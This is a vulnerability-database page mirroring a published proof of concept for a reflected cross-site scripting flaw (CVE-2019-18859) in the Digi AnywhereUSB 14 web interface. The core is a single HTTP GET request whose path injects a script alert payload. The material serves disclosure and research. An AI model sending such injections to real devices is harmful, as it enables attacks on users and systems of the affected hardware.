Lucene search

K

Digi AnywhereUSB 14 - Reflective Cross-Site Scripting Vulnerability

🗓️ 13 Jan 2020 00:00:00Reported by Raspina Net Pars GroupType 
zdt
 zdt
🔗 0day.today👁 69 Views

Digi AnywhereUSB 14 - Reflective Cross-Site Scripting Vulnerabilit

Show more
Related
Code
ReporterTitlePublishedViews
Family
Exploit DB
Digi AnywhereUSB 14 - Reflective Cross-Site Scripting
13 Jan 202000:00
exploitdb
Packet Storm
Digi AnywhereUSB 14 Cross Site Scripting
13 Jan 202000:00
packetstorm
NVD
CVE-2019-18859
9 Jan 202021:15
nvd
Prion
Design/Logic Flaw
9 Jan 202021:15
prion
Cvelist
CVE-2019-18859
9 Jan 202020:07
cvelist
CVE
CVE-2019-18859
9 Jan 202021:15
cve
exploitpack
Digi AnywhereUSB 14 - Reflective Cross-Site Scripting
13 Jan 202000:00
exploitpack
# Exploit Title: Digi AnywhereUSB 14 - Reflective Cross-Site Scripting
# Exploit Author: Raspina Net Pars Group
# Vendor Homepage: https://www.digi.com/products/networking/usb-connectivity/usb-over-ip/awusb
# Version: 1.93.21.19
# CVE : CVE-2019-18859

# PoC

GET //--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> HTTP/1.1
Host: Target
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1


# Author Website: HTTPS://RNPG.info

#  0day.today [2020-01-19]  #

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo